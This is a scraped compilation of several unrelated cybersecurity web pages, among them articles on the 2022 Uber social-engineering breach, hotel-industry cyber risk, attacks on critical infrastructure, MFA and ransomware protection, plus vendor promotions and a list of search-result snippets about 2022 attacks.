On September 15, 2022, Uber employees were surprised to find an unauthorized user posting in their company’s slack channel. They had hacked their way into the account and left a message that read, “I announce I am a hacker and Uber has suffered a data breach.” Uber employees, who did not reveal their identities, admitted that it appeared as if the hacker breached multiple internal applications and accessed sensitive data.

Although the suspected hacker, who is allegedly only 18 years old, has been arrested , the damage was done. The hacker had left an explicit image within Uber’s internal systems and exposed how they had hacked the company using social engineering . Uber is now having to launch their own internal investigation into the incident, and will more than likely have to enact a costly remediation plan.

How Did the Hacker Gain Access to Uber’s Internal Systems?

The Uber cybersecurity protocols would have probably been enough to prevent the data breach — if it weren’t for the use of social engineering. The hacker admitted on Twitter that they gained access to the company’s internal VPN by tricking an employee into handing it over. The hacker claimed they were a corporate information technology expert and needed the password. The threat actor also had access to credentials that allowed them to breach Uber’s AWS and G Suite accounts.

Social engineering — or the practice of using human emotion to get the victim to perform an action or give the threat actor needed information — is not uncommon in the cybersecurity world. In fact, many experts agree that untrained employees are your biggest area of vulnerability. The threat actor responsible for the Uber data breach has also claimed to have used social engineering when launching an attack against Rockstar Games .

Protect Your Company Against Incidents Like the Uber Data Breach

Stay up to date with the latest social engineering techniques.

Although direct messaging and calling are popular social engineering techniques, it’s expected that the cybercrime trend of impersonating well-known companies through email phishing scams will continue to grow this year. To protect your organization, be aware of these trends and speak with a cybersecurity consultant if you feel your organization is vulnerable.

Test Your Network Vulnerabilities Regularly

Unfortunately, social engineering isn’t going away — which means you need to know if there are vulnerabilities within your network that can make a social engineering attack even more disastrous. For example, a threat actor who has gained access to your internal network with stolen login credentials may be able to move laterally within your organization’s internal framework and escalate their privileges with help from unpatched applications or outdated technologies.

Routine vulnerability assessments performed quarterly can help your organization’s private data stay private. An expert assessment can help identify false positives from vulnerability scans and provide a report with more information. An assessment report may include discovered vulnerabilities, a walkthrough of what was done, and research and solutions to better protect your organization.

Continuously Train Your Employees To Recognize Attacks

Uber was hacked in 2022 because an employee did not recognize that they were a victim of social engineering. Cybersecurity awareness training can arm employees with valuable information so that they know what to do when suspicious activity occurs at work. Engaging learning tools such as training videos and live hack demonstrations can not only get your team up to speed, but can help motivate them to stay vigilant.

Kevin Mitnick Security Awareness Training

Aside from learning the details about cyberattacks like the Uber data breach, security awareness training for your employees can help keep you one step ahead of social engineers.

Train your team when and where it’s convenient, with the world's largest security awareness training content library. Begin strengthening your organization’s security posture by exploring the Security Awareness Training Library by Mitnick Security.

Topics: Social Engineering

Latest Posts

Kevin offers three excellent presentations, two are based on his best-selling books. His presentations are akin to technology magic shows that educate and inform while keeping people on the edge of their seats. He offers expert commentary on issues related to information security and increases “security awareness.”

Mitnick Security Training: QR Code Cybersecurity Test

Nearly 90 million smartphone users in the U.S. alone have used QR codes on their mobile devices. By 2025, that number is projected to grow to 100 mill..

Celebrating National Social Engineering Day

August 6th, 2024, marks the first annual National Social Engineering Day, an opportunity to raise awareness about social engineering threats and empha..

The Growth of Third-Party Software Supply Chain Cyber Attacks

When testing your employees' social engineering readiness, your teams need simulated attacks that feel as if they’re coming from a nefarious engineer...

Aerospace Overview
Light Aircraft
Construction
Entertainment
Financial Institutions Overview
Gallagher Banking Pro
Food and Agriculture
Higher Education
Life Sciences
Manufacturing
Nonprofit Overview
Affordable Housing Insurance and Consulting for Nonprofits
Human Services Consulting
Showguard™ Event Insurance
PEO and Temporary Staffing
Private Equity and M&A
Public Sector & K-12 Education
Real Estate and Hospitality
Restaurants
Senior Living
Transportation
Alternative Risk & Captives
Business Continuity Planning and Resiliency Services
Claims Overview
Commercial Lines Claims Contacts
Small Business Lines Claims Contacts
Home and Property Lines Claims Contacts
Claims Management & Advocacy
Claims Management and Third Party Administration
Commercial Surety Bonds
Construction Bonds
Credit and Political Risk
Crisis Resilience Insurance & Consulting
Data and Analytics
Diversity and Community Business Solutions
Enterprise Risk Management
Environmental
Executive and Financial Risk
Global Risk Management
Loss Control
Multinational Services Overview
Asia Pacific
Personal Lines
Product Recall
Reinsurance
Small Business
Workers Compensation
Insurance and Risk Management Webinars
Compensation Consulting and Total Rewards Programs
Compensation Survey Reports
Compliance Consulting Overview
Healthcare Reform Toolkit
Defined Benefit Pension Plans
Defined Contribution Retirement Plan Consulting
Diversity, Equity and Inclusion (DEI) Consulting
Employee Benefits Consulting
Employee Communications Consulting
Engagement Solutions
ESG Consulting
Executive Benefits
Executive Compensation Consulting
Executive Search Overview
Executive Career Opportunities
Financial and Retirement Services
Human Resources and Compensation Consulting Overview
Meet the Human Resource Compensation Consulting Team
Human Resources Consulting
Human Resources Technology Consulting
Individual Life and Wealth Consulting
Institutional Investment Consulting and Fiduciary Services
Leadership Advisors
Life and Annuity Brokerage
Multinational Benefits and HR Consulting
People Data & Analytics
Pharmacy Benefit Management Consulting
Physical and Emotional Wellbeing Consulting
Physician Compensation and Valuation
Research and Insights
Voluntary Benefits Consulting
News & Insights
Investor Relations
Our Purpose
Executive Team
The Gallagher Way
Gallagher Companies
Recognition & Awards
How We Work Overview
Mission Statement
Gallagher Better Works
Tools and Applications
Merge with Gallagher
Gallagher Global Network
Office Locations
Partnerships
Inclusion and Diversity
Global Standards
Compensation Disclosure

Hotel Industry Cyber Update — September 2022

Authors: Max Pragnell John Farley

The sensitive data hotels capture as a fundamental part of business is vast. Hotels collect consumers' identification (including passports), credit card information, addresses and — in cases involving spas, as an example — protected health information. Hospitality companies also retain employee data, trade secrets and suppliers' bank information. 1 This data makes hotels a valuable target for cybercriminals.

Ponemon and IBM Security's 2022 global case study report 2 revealed that $2.94 million was the average total cost of a data breach in the hospitality industry from 2021 to 2022. The associated costs from a breach come from several sources including lost business, reputational damage, legal costs, forensic activities, crisis management, regulatory response and customer notification — to name a few.

Recent examples of cyber attacks on the hospitality industry

Hotels and resorts have suffered from a variety of cyberattacks, but the most effective have been low-level social engineering and phishing campaigns. One cybercrime group known as TA558 3 has been targeting hospitality companies in Latin America with malicious links and attachments. Their method includes luring reservation emails directed toward hotel and travel company employees.

According to IBM Security's report, 2 83% of global organizations suffer more than one data breach. In September 2022, a hack of a well-known UK-based multinational hospitality company led to a two-day outage to their online booking system. 4 The same group also suffered from a ransomware attack at one of its Turkish locations the previous month, although no connection necessarily exists between the two breaches. The same multinational hospitality company settled a class-action lawsuit in 2019 for a malware breach that affected several of its hotels, restaurants and bars.

Hotel-specific cybersecurity challenges

A major challenge for hospitality in the cyberspace is allowing consumers to have a single access point to roam freely across a property. Third parties often manage restaurants, shops or spas within a hotel, 1 which means systems need to be interconnected and data needs to be shared. This typically involves a property management system (PMS) but it's not bulletproof. It requires strong cybersecurity measures and strict data compliance. Payment Card Industry Data Security Standard (PCI-DSS), multi-factor authentication (MFA), endpoint detection and response (EDR), and Data Protection Act compliance are safeguards required in different scenarios.

Hospitality companies face a further challenge when buying and selling properties. The buyer may face difficulties integrating new property management systems, payment terminals or overall cybersecurity strategies. Meanwhile the seller needs to ensure no residual data can come back to hurt them. 1

Popular types of cyber attacks

Phishing. Hackers send emails that seem to come from a trusted source to get hotel employees to open malware-laden attachments or click malicious links. In hospitality, time is money, so employees are often not well trained in cybersecurity. However, there are collections of templates commonly used by phishers and specific clues that an email may be dangerous. These templates can be used as training materials to educate staff about this threat.

Ransomware. Hotels are prime targets for ransomware attacks, and many have outdated security for point-of-sale systems. Small chains have been slow to beef up security measures, reasoning that they are not on the radar — a misconception. The industry is stepping up security and education to combat this growing problem.

Point-of-sale and payment card attacks. These attacks pose the biggest threat to the hospitality industry as a whole. Many are directed against vendors, who present an opportunistic weak link. Causes range from easy-to-hack passwords and insecure remote access to dated software and improper configuration.

Denial of service (DoS) attack. Typically, hackers flood systems with so much bogus traffic that servers become overwhelmed and can't operate.

DarkHotel hacking. DarkHotel 5 is a cybercrime group that targets high-value individuals — a practice called spearphishing — often through hotel Wi-Fi. Common targets include hotel guests who are CEOs and other top-level company executives. Once cybercriminals gain access, they can spy and steal confidential information.

Customer data and identity theft. One of the biggest risks to hotel security and reputation is the hacking of customer credit card data. As such, network security upgrades and employee training are essential.

Critical steps hotels need to take to improve cybersecurity

Taking a proactive approach to cyber risk is critical for organizations of all sizes. Partnering with a specialist in cyber risk can help you secure coverage, while also strengthening your organization's digital armor. Here are some important areas of focus:

Employee training
Email hygiene
Multi-factor authentication (MFA) and virtual private networks (VPN)
Patch management
Access controls
Detection and duplication
Breach response planning

For more detailed information on this list, see our Cyber Security Controls Checklist . This report reviews the most important questions cyber insurance underwriters are asking and provides remediation advice you can put into practice to position your organization in the most positive light when requesting cyber coverage.

A consultation with Gallagher could reveal new methods to manage your risk to cyber events. Risk transfer is only a piece of the puzzle, and our holistic approach could better prepare you for an inevitable cyber attack. Contact us to discuss your coverage gaps and cybersecurity posture, and why it's important to engage with cyber insurance today.

Author Information

Max Pragnell

Senior account executive, broker at iibre.

John Farley

Managing director — cyber liability practice.

New York, NY

1 CyberWire podcast segment with Mathieu Gorge, CEO of VigiTrust , CyberWire, 15 Sept 2022. Transcript.

2 " Cost of a Data Breach Report 2022 ," IBM Corporation, Jul 2022. PDF file.

3 Paganini, Pierluigi. " TA558 Cybercrime Group Targets Hospitality and Travel Orgs ," Security Affairs, 20 Aug 2022.

4 Kelleher, Suzanne Rowan. " Data Breach Takes Down IHG Hotel Group Booking System, Impacting Holiday Inn, Kimpton and More ," Forbes, 7 Sept 2022.

5 " DarkHotel APT: What It Is and How It Works ," Kapersky, accessed 30 Sept 2022.

Responding to a Ransomware Attack

2022 spring/summer insurance market report, client alert: the sec is introducing aggressive cybersecurity regulations in 2022.

Report: Attacks Surge With Critical Infrastructure Under Siege

Between January 2023 and January 2024, global critical infrastructure sustained 13 attacks per second.

KnowBe4, a leading provider of security awareness training and simulated phishing, recently released its latest report, Cyber Attacks On Infrastructure: The New Geopolitical Weapon. The report examines the growing threat of cyberattacks on critical infrastructure and provides insight into safeguarding against these potentially devastating attacks.

For Similar Content: Subscribe to Daily Newsletters

In recent years, cyberattacks targeting critical infrastructure have surged globally, posing significant risks to national security and economic stability. Unlike other data breaches, these attacks primarily seek to access control systems for the purpose of disruption or espionage. Energy, transportation, and telecommunications sectors have become primary targets.

This is not surprising as these sectors, especially in developed countries, have become increasingly interconnected to digital technologies, which in turn have opened new vulnerabilities to cyberattacks. The consequences of these types of attacks are potentially devastating , and thus geopolitical adversaries have made it a powerful addition to their arsenal of digital weapons.

Key findings from the report include:

The number of vulnerable points in U.S. power grids is growing by approximately 60 per day, with the total count rising from 21,000 in 2022 to between 23,000 and 24,000 today.
Globally, the average number of weekly cyberattacks against utilities has quadrupled since 2020, with a doubling occurring in 2023 alone.
Between January 2023 and January 2024, critical infrastructure worldwide sustained over 420 million attacks – equivalent to 13 attacks per second – marking a 30 percent increase from 2022.

According to KnowBe4’s 2024 Phishing by Industry Benchmarking Report , critical infrastructure sectors such as healthcare and pharmaceutical, education, and energy and utilities are in the high risk categories when it comes to employees falling victim to phishing tactics. This vulnerability is exploited by cybercriminals to infiltrate networks and systems.

"The findings in our report are a wake-up call for critical infrastructure sectors,” says Stu Sjouwerman, CEO at KnowBe4. “While the surge in cyberattacks on them is deeply concerning, it's important to remember that we're not powerless in this fight. By fostering a strong security culture that combines technology, processes, and people, we can significantly mitigate these risks. Every organization, regardless of size or sector, has a role to play in safeguarding our collective infrastructure. It's time we view cybersecurity not as just an IT issue, but as a fundamental aspect of our operational resilience and national security."

The report highlights recent high-profile attacks on global critical infrastructure, their far-reaching impacts, and provides actionable recommendations for organizations and institutions to enhance their cyber resilience.

To download a copy of KnowBe4’s report, Cyber Attacks On Infrastructure: The New Geopolitical Weapon , click here .

Industrial Media Unboxing Video

Report: Cloud Apps Abused for Malware Delivery

Tenable Unveils Update Focused on Exposure Solutions and Compliance

Security Breach: 'Ripping off the Band-Aid' to Ensure OT Security

Computer Crime Concept 516607038 2125x1416 (1)

Nozomi Networks Collaborates with Mandiant

Today in Manufacturing Podcast

The Keys to Successful Zero Trust Implementation

Choosing the Right OT Security Provider

Hoan Ton-That, CEO of Clearview AI, demonstrates the company's facial recognition software using a photo of himself.

Clearview AI Fined $33.7 Million by Watchdog over 'Illegal Database' of Faces

A CrowdStrike office is seen in Sunnyvale, Calif.

CrowdStrike Estimates the Tech Meltdown Left a $60 Million Dent in its Sales

Dragos Updates Platform to Streamline OT Threat and Vulnerability Workflows

SonicWall Unveils Zero Trust, Cloud Security Solutions

Super Micro Computer Faces Accusations of Accounting Irregularities

CISA Releases Advisory on Iran-based Ransomware Attacks

Security Breach: Combating the 20th Century Mafia with a Stronger Human Firewall

Dangerous Hooded Hacker Breaks Into Government Data Servers And Infects Their System With A Virus His Hideout Place Has Dark Atmosphere, Multiple Displays, Cables Everywhere 817486228 2313x1301 (1)

Inside the Wave of Software Supply Chain Cyberattacks

A Proactive, AI-Powered Cyber Risk Strategy

Cyber threats that shaped the first half of 2024

Global cybercrime has shown no sign of decline and is expected to grow strong per year over the next five years. To identify the most urgent cybersecurity threats of the first half of 2024, the Critical Start Cyber Research Unit (CRU) analyzed 3,438 high and critical alerts generated by 20 supported EDR solutions, as well as 4,602 reports detailing ransomware and database leak activities across 24 industries in 126 countries.

The first half of 2024 saw a worrying trend in cyberattacks targeting specific industries and key report findings include:

Manufacturing and Industrial Products remains the top targeted industry by cyber threat actors in H1 2024, leading with 377 confirmed reports of ransomware and database leak hits in the first half of the year.

Professional Services saw an increase in reported database leaks and ransomware attacks, jumping by 15% compared to 2023 with 351 cases reported vs. 334. Legal services organizations, including courthouses, and supply chains have become prime targets due to the wealth of intellectual property and sensitive data they possess.

Healthcare & Life Sciences – Ransomware and database leak incidents surged by 180% in February 2024 compared to the same period in 2023, coinciding with the attack on Change Healthcare and other healthcare providers.

Engineering and Construction remained a consistent target for cyberattacks in the first half of both 2023 and 2024 with the United States bearing the brunt of cyberattacks in the first half of 2024, experiencing a staggering 46.15% increase compared to 2023.

Technology – Researchers found a 12.75% decrease (from H1 2023) in database leaks and ransomware attacks targeting technology companies.

“The first half of 2024 has painted a concerning picture of the ransomware threat landscape. We are continuing to observe a surge in ransomware and database leak activities,” said Callie Guenther , Senior Manager of Cyber Threat Research at Critical Start. “With bad actors becoming more sophisticated, it is vital for organizations to have a strong security culture and strategy in place. MDR solutions that integrate asset inventory, endpoint controls security coverage, and MITRE ATT&CK mitigations, help organizations proactively mitigate risk, leading to a reduced attack surface and a more resilient security infrastructure.”

The report also highlights trending concerns for businesses, including:

BEC attacks: Previously focused on large corporations, BEC scammers are now targeting smaller, less cybersecurity-conscious businesses.
Deepfakes and social engineering: Findings show a surge in deepfake attacks , with an exponential 3,000% increase in deepfake fraud attempts.
Abuse of open-source repositories: Attackers are increasingly using these repositories to launch two main types of attacks: repo confusion attacks and supply chain attacks.
Critical Start

Next-Generation Attacks, Same Targets - How to Protect Your Users' Identities

The FBI and CISA Issue Joint Advisory on New Threats and How to Stop Ransomware

Note: on August 29, the FBI and CISA issued a joint advisory as part of their ongoing #StopRansomware effort to help organizations protect against ransomware. The latest advisory, AA24-242A , describes a new cybercriminal group and its attack methods. It also details three important actions to take today to mitigate cyber threats from ransomware – Installing updates as soon as they are released, requiring phishing-resistant MFA (i.e. non-SMS text-based), and training users.

The growth in the number of victims of ransomware attacks and data breaches has become so profound that the new cyber defense challenge is just keeping up with the number of new attacks and disclosures from victims. This is the product of stunning advancements in cybercriminal attack methods combined with a too-slow response by many organizations in adjusting to new attack methods. As predicted, Generative AI has indeed been a game changer for cybercriminals attacking organizations and it mandates urgent adjustments to cyber defense strategies.

Through this remarkable transformation in threats, one thing that hasn't changed is the inherent human limitations of everyday users and this is why they are the preferred target for cybercriminals. No amount of training will ever imbue the average user with the super-skills required to detect advanced phishing campaigns or sophisticated deep fakes.

To understand the impact, Token set out to collect perspectives on this pressing subject from cybersecurity leaders in their own words. To accomplish this, Token commissioned Datos Insights, a leading global data and advisory services firm for this research study that reveals the insights and perspectives of leading CISOs and workforce MFA leaders across the U.S. Datos Insights ditched the overused multiple choice questionnaire approach and conducted qualitative 60-minute video interviews to examine CISO perspectives in depth. In this article, we will examine the valuable insights gained from the research.

CISOs are unanimous that user vulnerabilities are their number one risk

Attack vectors are advancing in sophistication through the adoption of artificial intelligence capabilities, specifically generative AI, making them more difficult for CISOs and their teams to defend against. Cybercriminals most frequently target employees at large organizations through phishing attacks to gain network access. CISA reports that 90% of ransomware attacks are the result of phishing.

Increase your organization's security with insights from industry leaders. Download the " CISO Perspectives on Multifactor Authentication " report to uncover how top CISOs are navigating the evolving landscape of identity and access management, and learn how you can implement cutting-edge MFA strategies to protect your workforce and fortify your defenses against emerging threats.

Advanced Phishing Attacks remain the most effective tool in a hacker's arsenal. These attacks have become more targeted and sophisticated with the use of Gen AI. Gen AI also enables the launching of spear phishing attacks targeted at specific individuals within an organization on a large scale and with greater detail, leveraging real data about the organization and its employees to appear authentic. The tell-tale signs of phishing emails are rapidly disappearing as these emails are increasingly indistinguishable from legitimate communications. This will soon negate the value of user training.

The above is further compounded by the rise of Deepfake technology as Gen AI has given birth to new forms of social engineering attacks. Cybercriminals are now using AI-generated voices and videos to impersonate executives and other trusted individuals. These are being executed via phone calls from trusted phone numbers that are spoofed by the attackers and via Zoom conference calls where cybercriminals impersonate known and trusted colleagues. Attackers have been successful in convincing employees to transfer funds, share credentials, and perform other actions that can compromise security. These attacks exploit the inherent trust that employees place in familiar voices and faces, making them exceptionally dangerous.

The tools to conduct these attacks are now available to billions on the dark web with no specialized skills required. Phishing and ransomware attacks were once the exclusive realm of expert cybercriminals, but with the advent of generative AI and new cybercrime tools, launching these attacks has become accessible to anyone with access to the dark web, which is anyone with a computing device and an internet connection. Ransomware-as-a-Service (RaaS) and AI-driven tools available on the dark web have simplified the process, eliminating the need for advanced skills. This shift enables individuals with minimal technical knowledge to execute sophisticated cyberattacks with just a computer and internet connection. The gig economy meets the next generation of cyber attacks.

New attacks require new defense strategies

Phishing-Resistant MFA Adoption is critical and no longer a nice to have. With phishing attacks as the top cyber threat for enterprises, legacy MFA is being proven increasingly inadequate as the numbers of victims substantiate. Many legacy MFA solutions are decades-old technology. The current report highlights the urgency of deploying phishing-resistant, next-generation MFA solutions, especially in the face of AI-enhanced phishing attacks. CISOs should accelerate the shift toward MFA solutions that are hardware-based, use biometrics, and are FIDO compliant. These significantly mitigate phishing and ransomware attacks and would have prevented the overwhelming majority of current ransomware attacks saving organizations a combined billions of dollars in losses in the last year alone.

Next-generation MFA is best implemented with targeted deployments for privileged users. The report emphasizes the importance of prioritizing the deployment of next-generation MFA to high-risk users within the enterprise, particularly systems administrators and executives. CISOs need to improve risk management for System Administrators despite having privileged access management (PAM) solutions. "PAM solutions have functioned as the historical norm for CISOs managing system admin risks." The rise of phishing and insider attacks necessitates that CISOs prioritize MFA upgrade deployments at this important business risk. The report found that senior executives at many firms lack robust security solutions aligned with their business functions and business risk. Almost none of the CISOs interviewed had distinct controls deployed for their executive users. With spear-phishing and other techniques on the rise, this gap was unexpected and troubling.

The techniques used by cybercriminals are constantly evolving, but never so rapidly as over the past twelve months. We have surpassed the capacity of our users to be our first line of cyber defense and we have not given them any new tools beyond those developed years or decades ago. By staying informed about the latest threats and implementing a multi-layered defense strategy that emphasizes upgrading to phishing-resistant, next-generation MFA, organizations can protect their users' identities and stop cybercriminals from gaining unauthorized access to data and sensitive operations. Protecting your users from new attacks requires vigilance, education, and the right tools. By prioritizing these areas, organizations can significantly reduce the risk of a successful cyberattack and maintain the trust of their customers and stakeholders.

Learn more about how Token's Next-Generation MFA can stop phishing and ransomware from harming your organization at tokenring.com

Cybersecurity Webinars

Master ai-driven vulnerability management.

Transform Your Team: Learn How Security Champions Turn Developers into Security Advocates

The 60-Minute GenAI Security Masterclass

Get actionable steps and tools to harness the full potential of GenAI while protecting your sensitive data.

FinTech, Healthcare & SaaS Need Non-Human Identity Management More Than Ever Before

Achieving Data Resilience in Microsoft 365

How Confident Are You That Your Critical Saas Applications Are Secure?

Best Practices for Integrating ZTNA with Existing Security Infrastructure

Get the latest news, expert insights, exclusive resources, and strategies from industry leaders – all for free.

List of available regions

Main regions.

Worldwide (English)
Europe (English)
América Latina (español)
Canada (English)
Canada (français)
EE.UU. (español)
USA (English)

ASIA & PACIFIC

इंडिया (हिंदी)
Indonesia (English)
Indonesia (Bahasa Indonesia)
Malaysia (English)
Malaysia (Bahasa Melayu)
New Zealand
Philippines (English)
Pilipinas (Filipino)
business security -->
Avast News -->
Security News -->
Tips & Advice -->
Viewpoints -->
Privacy -->
Threat Research -->
Diversity & Inclusion -->
Blog Authors
Visit Avast website

Ransomware attacks continue to increase in the US, UK, and Canada

The Gen Threat Report, formerly known as the Avast Threat Report, has revealed a 100% increase in ransomware activity for the US, UK, and Canada; 66% in Australia; and a whopping 379% in India.

Ransomware is one of the most dangerous and fast-growing threats in the digital world today. It’s a type of malware that can lock you out of your files or entire system until you pay a ransom, usually in cryptocurrency.

Unfortunately, as detailed in the Gen Q2/2024 Threat Report , the threat of ransomware is not going away—in fact, it’s getting worse. Let’s take a closer look at what ransomware is, how it’s evolving, and what you can do to protect yourself.

What is ransomware?

Ransomware is a form of malicious software that, once it infects your device, encrypts your files or locks you out of your system entirely. The attackers then demand a ransom, often in Bitcoin or another cryptocurrency, in exchange for a decryption key that will supposedly restore your access.

These attacks can be devastating. Imagine losing access to your family photos, important work documents, private information, or your entire digital life in an instant. That’s the reality of a ransomware attack—and paying the ransom doesn’t guarantee you’ll get your data back. In many cases, victims who pay the ransom never receive the promised decryption key.

The rise of ransomware in 2024

Ransomware attacks are on the rise, with a notable 24% increase in the second quarter of 2024 alone. The sharpest spikes were seen in the United States, United Kingdom, Canada, and India. However, no country is safe from this growing threat. Recently , ransomware attacks have become more sophisticated, targeting both individuals and businesses with increased precision.

One reason for this increase is the evolution of ransomware tactics. Cybercriminals are constantly refining their methods to maximize their impact. For example, some attackers now not only encrypt your files but also threaten to release sensitive data publicly if you don’t pay up multiple times. This double-extortion tactic puts even more pressure on victims to comply with their demands.

Real-world examples of ransomware from 2024

One of the most prevalent strains was LockBit, a ransomware family that has been wreaking havoc across the globe. Interestingly, after the identity of one of its key developers was revealed, the number of LockBit attacks surged, possibly as an act of retaliation or desperation.

Another concerning development was the rise of Twizt, a botnet that shifted its focus to spreading LockBit ransomware through malicious email attachments. This change in tactics shows how flexible and adaptive these cybercriminals can be, always looking for new ways to infiltrate systems and extort money.

Despite the alarming rise in ransomware attacks, there were also some victories. Law enforcement agencies around the world have been actively working to disrupt these criminal operations. In Q2/2024, several high-profile botnet providers were taken down, leading to arrests and the seizure of infrastructure.

Additionally, cybersecurity companies have continued to develop free decryption tools, like the one released for the DoNex ransomware. Created by our own team of experts, this tool may give the victims a chance to recover their files without paying a ransom.

How ransomware spreads

Ransomware can infect your device in several ways, not so different from other types of malware. Here are a few of the most common methods:

Phishing emails: Many ransomware attacks begin with a phishing email that contains a malicious attachment or link. When you open the attachment or click the link, the ransomware is downloaded and installed on your device.
Malicious websites: Sometimes, visiting a compromised or fake website is enough to get infected. These sites might exploit vulnerabilities in your browser or prompt you to download an infected file.
Drive-by downloads: In some cases, simply visiting a website can trigger a download of the ransomware without any interaction on your part. This can happen if the website is compromised and has malicious scripts embedded in its code.
Infected software or apps: Downloading software or apps from untrusted sources can also lead to a ransomware infection. Always make sure you’re downloading from reputable sites or official app stores.
Exploited vulnerabilities: Cybercriminals can exploit security flaws in your operating system or software to install ransomware. This is why keeping your software up to date is so critical.

7 tips to help protect you against ransomware

While ransomware is a serious threat, there are actions you can take to help protect yourself. Here are 7 things you can do:

Back up your data regularly. The best defense against ransomware is having up-to-date backups of your important files. Make sure these backups are stored offline or in a secure cloud service. If you’re hit by ransomware, you can restore your files without paying the ransom.
Be cautious with email attachments and links. Be wary of unsolicited emails, especially those with attachments or links. Even if an email looks like it’s from a trusted source, verify its legitimacy before opening anything.
Keep your software updated. Regularly updating your operating system, antivirus, and other software is crucial. These updates usually include security patches that protect against known vulnerabilities.
Use difficult and unique passwords. Ensure that your accounts are protected with strong, unique passwords. Consider using a password manager to help you keep track of them. Enable two-factor authentication (2FA ) wherever possible.
Install reliable security software. A robust antivirus can help detect and block ransomware before it can do any harm. Make sure your security software is always up to date.
Avoid untrusted websites and downloads. Be cautious when downloading files or software, especially from unfamiliar websites. Stick to reputable sources to reduce your risk of infection.
Keep yourself informed. Awareness is key. Make sure you and your loved ones understand the risks of ransomware and how to avoid it. Knowing what to look for can help prevent an attack before it happens.

What to do if you’re targeted by a ransomware attack

No one wants to go through a ransomware ordeal, but it can happen to anyone. If it does happen, here’s what you should do:

Disconnect from the internet. Immediately disconnect your device from the network to prevent the ransomware from spreading to other devices on your network.
Don’t pay the ransom. Paying the ransom doesn’t guarantee you’ll get your data back. It also encourages these criminals to continue their activities. Instead, restore the data from your backup or look for decryption tools that might help you recover your files.
Contact a professional. Reach out to a cybersecurity expert or a reputable IT professional who can help assess the situation and determine the best course of action.
Report the incident. Report the ransomware attack to local law enforcement and any relevant authorities, such as the FBI in the US or the National Cyber Security Centre in the UK. This can help in tracking down the attackers and preventing future incidents.

Protecting against ransomware

Ransomware is a growing threat that requires our constant attention and vigilance. By staying informed and taking proactive steps to protect your data, you can reduce the risk of falling victim to these attacks. Remember, the best defense is always a good offense—stay alert, stay updated, and stay safe.

You’re telling me that ad was fake malvertising is sneakier than ever | avast.

The quality of malicious ads has improved immensely, making it harder for users to distinguish between what’s real or fake.

YouTube, The Backdrop Of A Scammer’s Play | Avast

The video sharing platform has become a trendy scene for cyberattackers as of late.

The Essential Guide to Ransomware

Ransomware is a threat to individuals, businesses, and even hospitals. Learn how ransomware works and keep your files safe from hackers.

Most popular

The hidden pitfalls of travel apps, video: accept all cookies a recipe for online privacy this holiday season, how to use discord’s ‘family center’ to help protect your child, avast researchers uncover disturbing crowdfunding scheme, your essential cybersecurity checklist for safe summer travel.

COMMENTS

Top Cyberattacks of 2022: Lessons Learned
For over a decade, I have analyzed the root causes, trends and patterns from what post-breach management specialists like to call unauthorized third parties performing really sophisticated cyberattacks. In the past, these cyberattacks were rarely "sophisticated" - and "unauthorized third parties" almost always meant cybercriminals.. 2022 was different because infamy, that quality of ...
The Worst Hacks and Breaches of 2022 So Far
Whether the first six months of 2022 have felt interminable or fleeting—or both—massive hacks, data breaches, digital scams, and ransomware attacks continued apace throughout the first half of ...
The biggest data breaches and leaks of 2022
Twitter confirms data from 5.4 million accounts was stolen. In July 2022, a hacker that went by the alias 'devil' posted on hacking forum BreachForums that they had the data of 5.4 million Twitter accounts for sale. The stolen data included email addresses and phone numbers from "celebrities, companies, randoms, OGs".
The biggest cyber attacks of 2022
The biggest cyber attacks of 2022. Patrick O'Connor, CISSP, CEH, MBCS takes a look at significant security incidents in 2022 so far: some new enemies, some new weaknesses but mostly the usual suspects. In a year of global inflation and massive rises in energy costs, it should come as no surprise that the cost of a data breach has also reached ...
Uber Investigating Breach of Its Computer Systems
By Kate Conger and Kevin Roose. Sept. 15, 2022. Uber discovered its computer network had been breached on Thursday, leading the company to take several of its internal communications and ...
Case Study: Viasat Attack
On February 24th, 2022, the day of Russia's invasion into Ukraine, a cyberattack disrupted broadband satellite internet access. This attack disabled modems that communicate with Viasat Inc's KA-SAT satellite network, which supplies internet access to tens of thousands of people in Ukraine and Europe. Researchers from SentinelLabs believe that ...
Top 10 cyber crime stories of 2022
6. Uber suffers major cyber attack. Ride-sharing service Uber was one of 2022's high-profile cyber attack victims in September, when it suffered a supposed social engineering attack on an ...
The 13 Costliest Cyberattacks of 2022
2. October 2022: Medibank. A costly attack on health insurer Medibank affected all of its 3.9 million current and former customers. Attackers demanded a ransom payment of $9.7 million not to ...
Cyber Threats 2022: A Year in Retrospect
And in 2022, public and private sectors joining forces and sharing their intelligence bolstered organisations' defences. Our report "Cyber Threats 2022: A Year in Retrospect" examines the threat actors, trends, tools and motivations that captured the cyber threat landscape last year. It includes incident response case studies with direct ...
Cyberattacks against governments jumped 95% in last half of 2022
The number of attacks targeting the government sector increased by 95% worldwide in the second half of 2022 compared to the same period in 2021, according to a new report by AI-based cybersecurity ...
Recent Cyber Attacks
Recent Cyber Attacks from 2023. Under normal business circumstances, cyber attacks are an ever-increasing problem causing trillions of dollars in losses. To make matters worse, the war between Russia and Ukraine exacerbated these problems with a flurry of major politically-motivated cyber attacks in 2022. Here are some of the recent cyber attacks.
U.S. Department of Justice Disrupts Hive Ransomware Variant
Since late July 2022, the FBI has penetrated Hive's computer networks, captured its decryption keys, and offered them to victims worldwide, preventing victims from having to pay $130 million in ransom demanded. Since infiltrating Hive's network in July 2022, the FBI has provided over 300 decryption keys to Hive victims who were under attack.
PDF 14 CYBER SECURITY PREDICTIONS FOR 2022 AND BEYOND
This year's report, 14 Cyber Security Predictions for 2022 and Beyond, features more than a dozen. insights from our leaders and foremost experts located all around the globe, including. ed Practices, and C. arles Carmakal, SVP and ChiefTechnology Officer.Turn the pa. MW.
Cisco Talos shares insights related to recent cyber attack on Cisco
Executive summary. On May 24, 2022, Cisco became aware of a potential compromise. Since that point, Cisco Security Incident Response (CSIRT) and Cisco Talos have been working to remediate. During the investigation, it was determined that a Cisco employee's credentials were compromised after an attacker gained control of a personal Google ...
What Caused the Uber Data Breach in 2022?
Free trial. The Uber data breach began with a hacker purchasing stolen credentials belonging to an Uber employee from a dark web marketplace. An initial attempt to connect to Uber's network with these credentials failed because the account was protected with MFA. To overcome this security obstacle, the hacker contacted the Uber employee via ...
How a Group of Israel-Linked Hackers Has Pushed the Limits of ...
About eight minutes after 3 am on June 27, 2022, inside the Khouzestan steel mill near Iran's western coastline on the Persian Gulf, a massive lid lowered onto a vat of glowing, molten metal.
5 Major Ransomware Attacks of 2022
